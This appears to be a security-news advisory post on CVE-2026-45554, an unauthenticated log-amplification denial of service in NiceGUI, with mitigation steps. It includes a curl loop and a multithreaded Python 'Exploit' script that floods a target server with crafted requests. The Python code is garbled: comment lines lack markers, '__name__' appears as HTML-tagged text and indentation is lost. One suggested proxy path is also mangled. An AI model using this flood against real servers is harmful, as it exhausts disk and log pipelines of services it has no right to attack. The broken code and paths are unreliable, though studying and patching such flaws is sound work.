NiceGUI, Unauthenticated Log‑Volume Denial of Service, CVE‑2026‑45554 (moderate)

Listen to this Post

Two FastAPI routes in NiceGUI—the per‑component resource route (added in v1.4.6) and the ESM module route (added in v3.0.0)—accept a user‑controlled sub‑path parameter. Each route joins this sub‑path with a base directory and passes the result to Starlette’s FileResponse. The existing guard uses pathlib.Path.exists(), which returns `True` for directories. If the resolved sub‑path points to a directory, `FileResponse` raises an unhandled `RuntimeError` because it expects a file. FastAPI lacks a default handler for this RuntimeError, so the exception propagates to Uvicorn, which logs a full multi‑frame traceback (roughly 100 lines per request). The routes are reachable without authentication. Therefore, a remote attacker can send crafted requests that map to existing directories, triggering the exception repeatedly. This results in massive log amplification, consuming disk space, saturating log‑shipping pipelines, and causing alert fatigue. The attack has no impact on confidentiality or integrity; it only affects log‑based availability.

dailycve form:

Platform: NiceGUI
Version: <=3.11.1
Vulnerability: Log amplification
Severity: Moderate
Date: 2026‑05‑18

Prediction: Patch 2026‑05‑20

Analytics under heading What Undercode Say:

Simulate a log-amplification attack by sending 1000 crafted requests
for i in {1..1000}; do
curl -s "http://target-ip:8080/_nicegui/3.11.1/esm/dummy/missing"
done
Monitor log growth
watch -n 1 'du -h /var/log/nicegui/uvicorn.log'
Check for repeated RuntimeError traces
grep -c "RuntimeError" /var/log/nicegui/uvicorn.log

Exploit:

import requests
import threading
def trigger_log_flood(target_url):
Craft a request that resolves to an existing directory (e.g., /)
try:
r = requests.get(target_url + "/_nicegui/3.11.1/esm/static")
Expect HTTP 500 and a traceback in server logs
except:
pass
if <strong>name</strong> == "<strong>main</strong>":
target = "http://192.168.1.100:8080"
threads = []
for _ in range(50):
t = threading.Thread(target=trigger_log_flood, args=(target,))
t.start()
threads.append(t)
for t in threads:
t.join()

Protection from this CVE:

Upgrade to NiceGUI >=3.12.0.

Until upgrade, place NiceGUI behind a reverse proxy that rejects requests with an empty sub‑path after `/_nicegui//esm//` or /_nicegui/<version>/resources/<key>/.

Rate‑limit the `/_nicegui/` prefix at the proxy level.

Configure aggressive log rotation for the affected service.

Impact:

A remote unauthenticated attacker can force the server to emit large tracebacks (~100 lines per request) for each crafted request. At sustained rates, this exhausts disk space, overloads log pipelines, and masks legitimate security events. No data leakage or remote code execution occurs.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top